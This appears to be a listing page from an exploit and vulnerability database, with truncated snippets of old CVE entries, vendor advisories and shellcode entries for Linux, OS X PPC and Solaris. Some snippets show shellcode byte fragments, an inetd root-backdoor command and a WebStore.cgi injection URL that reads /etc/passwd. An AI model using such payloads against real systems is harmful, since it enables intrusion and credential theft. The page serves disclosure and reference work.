CVE-2004-2183

Unknown vulnerability in WeHelpBUS 0.1 allows remote attackers to execute arbitrary shell commands via the query string...

linux/x86 Radically Self Modifying Code 70 bytes

No description provided by source. /-------------------------------------------------------/ / Radically Self Modifying Code for surviving / / toupper and tolower / / / / 70byte execve & exit code by XORt / /-------------------------------------------------------/ "\xeb\x12" / jmp $0x12 / "\x5e" ...

linux/x86 execve code 23 bytes

Exploit for linux/x86 platform in category shellcode ============================== linux/x86 execve code 23 bytes ============================== / Linux 23 byte execve code. Greetz to preedator marcetam admin at marcetam.net / char linux= "\x99" / cdq / "\x52" / push %edx / "\x68\x2f\x2f\x73\x68...

[Full-Disclosure] TWiki search function allows arbitrary shell command execution

VULNERABLE SOFTWARE VERSIONS TWiki http://twiki.org/ - TWiki 20030201 e.g. Debian Sarge - probably later versions - Subversion repository at http://ntwiki.ethermage.net:8181/svn/twiki/trunk at least until revision 3224 including ATTACK VECTORS HTTP GET requests towards the Wiki server typically...

Debian DSA-229-1 : imp - SQL injection

Jouko Pynnonen discovered a problem with IMP, a web-based IMAP mail program. Using carefully crafted URLs a remote attacker is able to inject SQL code into SQL queries without proper user authentication. Even though results of SQL queries aren't directly readable from the screen, an attacker migh...

os-x/PPC Add user r00t 219 bytes

os-x/PPC Add user r00t 219 bytes. Shellcode exploit for osxppc platform / PPC OS X / Darwin Shellcode by B-r00t. 2003. open; write; close; execve; exit; See ASM below. 219 Bytes! / char shellcode = "\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x48\x02\xa6\x3b\xea\x01\x70"...

solaris/x86 add services and execve inetd 201 bytes

Exploit for solaris/x86 platform in category shellcode =================================================== solaris/x86 add services and execve inetd 201 bytes =================================================== / Solaris/x86 Just execve's the following: "echo "ingreslock stream tcp nowait root...

Web_Store.cgi allows Command Execution

WebStore.cgi allows Command Execution: This application was written by Selena Sol and Gunther Birznieks. You can execute shellcommands: http://www.victim.com/cgi-bin/webstore.cgi?page=.html|cat /etc/passwd| Zero X, member of www.Lobnan.de and www.Lostkey.org...

webstoreExec.txt

WebStore.cgi allows Command Execution: This application was written by Selena Sol and Gunther Birznieks. You can execute shellcommands: http://www.victim.com/cgi-bin/webstore.cgi?page=.html|cat /etc/passwd| Zero X, member of www.Lobnan.de and www.Lostkey.org...

Microsoft Internet Explorer - Remote Application.Shell

Microsoft Internet Explorer - Remote Application.Shell function InjectedDuringRedirection showModalDialog'md.htm',window,"dialogTop:-10000;dialogLeft:-10000;dialogHeight:1; dialogWidth:1;".location="vbscript:"""; setTimeout"myiframe.execScriptInjectedDuringRedirection.toString",100;...

RHEL 2.1 : xpdf (RHSA-2003:197)

Updated Xpdf packages are available that fix a vulnerability where a malicious PDF document could run arbitrary code. Updated 21 July 2003 Updated packages are now available, as the original errata packages did not fix all possible ways of exploiting this vulnerability. Xpdf is an X Window System...

Multiple vulnerabilities in P4DB

Product: P4DB URL: http://www.mydata.se/ftp/P4DB/ Version: P4DB v2.01 and earlier Risk: Multiple vunlerabilities high Description: P4DB is a CGI based tool that provides a web-based interface to Perforce source code repositories. It is third-party software, developed by an individual and...

Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy (MS04-004)

Microsoft Internet Explorer 5 - NavigateAndFind Cross-Zone Policy MS04-004 source: https://www.securityfocus.com/bid/9568/info A vulnerability has been reported in Microsoft Internet Explorer. Because of this, an attacker may be able to violate cross-zone policy. It has been reported that the iss...

Subscribe Me Pro/Enterprise - Remote Code Execution via Backticked Perl Variable Injection.

Pimp industries. "Its all about the Bling, Bitches and Fame!" Subscribe Me Pro/Enterprise All recent versions of Pro/Enterprise Remote Code Execution via Backticked Perl Variable Injection. C Paul Craig Pimp Industries 2003 This advisory is also online at:...

Important: Red Hat Security Advisory: xpdf security update

Updated Xpdf packages are available that fix a vulnerability where a malicious PDF document could run arbitrary code. Updated 21 July 2003 Updated packages are now available, as the original errata packages did not fix all possible ways of exploiting this vulnerability. Xpdf is an X Window System...

Xonic.ru News 1.0 - script.php Remote Command Execution

Xonic.ru News 1.0 - script.php Remote Command Execution source: https://www.securityfocus.com/bid/7365/info A vulnerability has been reported for Xonic.ru News. The problem occurs due to insufficient sanitization of user-supplied data to the 'script.php' file. As a result, it may be possible for ...

Xonic.ru News 1.0 - 'script.php' Remote Command Execution

source: https://www.securityfocus.com/bid/7365/info A vulnerability has been reported for Xonic.ru News. The problem occurs due to insufficient sanitization of user-supplied data to the 'script.php' file. As a result, it may be possible for an attacker to pass malicious PHP or shell commands in...

Security Update: [CSSA-2003-SCO.3] UnixWare 7.1.1 Open UNIX 8.0.0 UnixWare 7.1.3 : ftp vulnerability with pipe symbols in filenames

To: [email protected] [email protected] [email protected] [email protected] SCO Security Advisory Subject: UnixWare 7.1.1 Open UNIX 8.0.0 UnixWare 7.1.3 : ftp vulnerability with pipe symbols in filenames Advisory number: CSSA-2003-SCO.3 Issue date: 2003 March...

DotBr 0.1 - 'Exec.php3' Remote Command Execution

source: https://www.securityfocus.com/bid/6867/info The DotBr 'exec.php3' script is prone to a remote command execution vulnerability. This is due to insufficient sanitization of user-supplied data. Exploitation may result in execution of arbitrary shell commands with the privileges of the...

DotBr 0.1 - 'System.php3' Remote Command Execution

source: https://www.securityfocus.com/bid/6866/info The DotBr 'system.php3' script is prone to a remote command execution vulnerability. This is due to insufficient sanitization of user-supplied data. Exploitation may result in execution of arbitrary shell commands with the privileges of the...